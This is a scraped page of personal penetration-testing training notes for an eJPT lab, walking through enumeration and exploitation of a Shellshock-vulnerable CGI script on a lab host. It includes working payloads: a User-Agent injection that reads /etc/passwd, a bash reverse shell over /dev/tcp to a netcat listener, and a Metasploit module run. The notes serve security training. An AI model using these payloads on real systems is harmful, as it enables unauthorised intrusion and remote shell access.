INE Training Notes - by syselement

Home Blog GitHub Buy Me a Book

Home Blog GitHub Buy Me a Book

INE Training Notes
Courses
🏠syselement's Blog Home

Powered by GitBook

On this page

Was this helpful?

Courses

eJPT - PTSv2

📒2. Host & Network Penetration Testing

System/Host Based Attacks

Linux Attacks

🔬Bash

PreviousLinux Attacks Next🔬FTP

Last updated 1 year ago

Lab 1

🔬
Target IP: 192.173.104.3
Bash Exploitation -

Enumeration

Check the website via a browser:
- http://192.173.104.3/
View Page Source
- http://192.173.104.3/gettime.cgi
- gettime.cgi script can be utilized as the attack vector

Check if the server is vulnerable to ShellShock

Manual Exploitation

- Configure FoxyProxy on Firefox, click on Burp Suite in FoxyProxy and run Burp Suite
- Inside Proxy menu, turn Intercept On
Reload the /gettime.cgi webpage in Firefox and intercept the response in BurpSuite

Send the request to the Repeater
Replace User-Agent: value with characters:

Send the request and check the Response

📌 The target is vulnerable to ShellShock

Reverse Shell

Set up a listener

Open Burp Suite and change the command to connect to the netcat listener of the Kali VM. The payload will be:

Turn off burpsuite listener and FoxyProxy.

Automatic Exploitation

To inject special characters into the user-agent HTTP header, can be used.

🐧

Lab 1
Enumeration
Manual Exploitation
Reverse Shell
Automatic Exploitation

Shellshock exploitable environment

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173.104.3

() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

nc -nvlp 1234

() { :; }; echo; echo; /bin/bash -c 'bash -i >&/dev/tcp/192.173.104.2/1234 0>&1'

msfconsole -q

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.173.104.3
# RPORT is ok, 80
set TARGETURI /gettime.cgi
exploit

eth1@if54460  UP  192.173.104.2/24 
# target IP is 192.173.104.3

nmap -sV 192.173.104.3

80/tcp open  http    Apache httpd 2.4.6 ((Unix))